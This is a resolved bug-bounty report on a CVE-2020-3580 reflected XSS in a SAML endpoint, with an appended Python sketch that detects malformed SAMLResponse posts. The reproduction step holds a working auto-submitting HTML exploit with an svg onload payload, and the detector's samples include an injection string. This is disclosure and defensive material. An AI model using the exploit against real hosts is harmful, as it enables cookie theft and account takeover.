XSS DUE TO CVE-2020-3580
Medium
U.S. Dept Of Defense
Reported by
ghimire_veshraj
Vulnerability Details
Technical details and impact analysis
Hello Team,
During my research, I found the following host to be vulnerable to CVE-2020-3580, which is a POST-based XSS.
Vulnerable URL: https://████/+CSCOE+/saml/sp/acs?tgname=a
## Impact
Attackers can steal cookies and even take over accounts and perform different malicious activities.
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Save the following code as xss.html and open it in a browser:

```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://███/+CSCOE+/saml/sp/acs?tgname=a" method="POST">
<input type="hidden" name="SAMLResponse" value=""><svg/onload=alert('XSS')>" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
## Suggested Mitigation/Remediation Actions
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Submitted
Weakness: Cross-site Scripting (XSS) - Reflected
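
The following detection sketch is an added example, not part of the original report or of any vendor tooling. It flags POSTs to the endpoint named in the report whose `SAMLResponse` field is not the base64-encoded XML that the SAML HTTP-POST binding carries. It assumes a proxy or WAF log that records request bodies; the function names and the sample requests are constructed for illustration.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlencode, urlsplit

ACS_PATH = "/+CSCOE+/saml/sp/acs"  # endpoint path as given in the report


def classify_acs_post(target: str, body: str) -> str:
    """Classify one POST (request target + form body): not-acs, ok, or suspicious:<reason>."""
    if urlsplit(target).path != ACS_PATH:
        return "not-acs"
    values = parse_qs(body, keep_blank_values=True).get("SAMLResponse", [])
    if len(values) != 1:
        return "suspicious:missing-or-repeated-field"
    value = values[0]
    # The HTTP-POST binding carries base64, so raw markup never belongs here.
    if any(ch in value for ch in "<>\"'"):
        return "suspicious:markup-characters"
    try:
        decoded = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "suspicious:not-base64"
    if not decoded.lstrip().startswith(b"<"):
        return "suspicious:decoded-not-xml"
    return "ok"


def flag_requests(records):
    """Return (target, verdict) for every record whose verdict is suspicious."""
    flagged = []
    for target, body in records:
        verdict = classify_acs_post(target, body)
        if verdict.startswith("suspicious"):
            flagged.append((target, verdict))
    return flagged


# Constructed sample requests (not captured traffic).
_GOOD = base64.b64encode(b'<samlp:Response ID="_constructed"/>').decode()
SAMPLES = [
    (ACS_PATH + "?tgname=a", urlencode({"SAMLResponse": _GOOD})),
    (ACS_PATH + "?tgname=a", urlencode({"SAMLResponse": '"><b>constructed</b>'})),
    (ACS_PATH + "?tgname=a", urlencode({"SAMLResponse": "plain text!"})),
    ("/index.html", "q=1"),
]

if __name__ == "__main__":
    for target, verdict in flag_requests(SAMPLES):
        print(verdict, target)
```

A verdict of `ok` only means the field has the expected shape; it does not validate the assertion or its signature.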